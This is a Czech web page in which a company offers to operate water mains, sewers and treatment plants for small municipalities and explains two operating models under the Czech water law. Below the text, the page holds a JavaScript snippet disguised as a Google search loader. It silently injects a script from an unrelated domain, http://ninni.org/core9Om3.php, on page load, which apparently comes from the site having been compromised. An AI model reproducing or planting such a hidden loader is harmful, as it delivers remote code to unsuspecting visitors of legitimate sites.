Provozování vodovodů, kanalizací a ČOV

Tyto služby jsou především směrovány jako odborná pomoc malým a středním obcím, vlastníkům infrastrukturního majetku – vodovodů a kanalizací. Vlastník vodohospodářského infrastrukturního majetku ( VISM ), který se nachází v jeho katastrálním území, má právní povinnosti zajistit jejich provozování. Provozování se pak provádí na základě jednoho ze čtyř základních modelů provozování v ČR. Na základě platné legislativy ve vodním hospodářství jsou pak stanoveny povinnosti vlastníků a provozovatelů vodovodů a kanalizací. Pokud vlastník VISM uplatňuje oddílný nebo samostatný model provozování je s tím spojena řada povinností, potřebných odborných znalostí a praktických zkušeností.

Zde je naší snahou nabídnout naše odborné znalosti, dlouhodobé zkušenosti a komplexní technickou a legislativní podporu.

V rámci námi poskytovaných vodohospodářských služeb se vychází z oddílného, popř. samostatného modelu provozování. Ostatní modely ( vlastnický nebo smíšený ) jsou uplatňovány především velkými společnostmi VaK.

model – provozování

model provozování je definován jako spolupráce mezi Vlastníkem a Provozovatelem, na základě uzavřené smlouvy o provozování vodovodu nebo kanalizace. Vlastník si sám zajišťuje uzavírání smluv s odběrateli, jejich evidenci a výběr  Vodného a Stočného a provozovateli platí za ostatní zajišťované vodohospodářské služby. Provozovatel vlastní pracovní síly, technická zařízení nezbytná pro zajištění provozu, údržby a oprav a dále potřebná oprávnění, odborné znalosti a zkušenosti s provozováním vodohospodářské infrastruktury. Provozovatel přebírá i některá dohodnutá rizika, která podle zákona 274/2001 Sb.,  nese primárně vlastník s tím, že pokud se riziko materializuje, nese provozovatel i jeho důsledky finanční.

model – zaštitování

Dle podmínek dotací si musí obec provozovat ČOV sama.
Vlastník si svou vodohospodářskou infrastrukturu provozuje sám, vlastním jménem a na vlastní odpovědnost. Pouze některé vybrané odborné činnosti a dozor si zajišťuje na základě servisní smlouvy , přičemž veškerá odpovědnost za provozování a také výběr Vodného a Stočného zůstává na vlastníkovi.

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


Komentáře nejsou povoleny.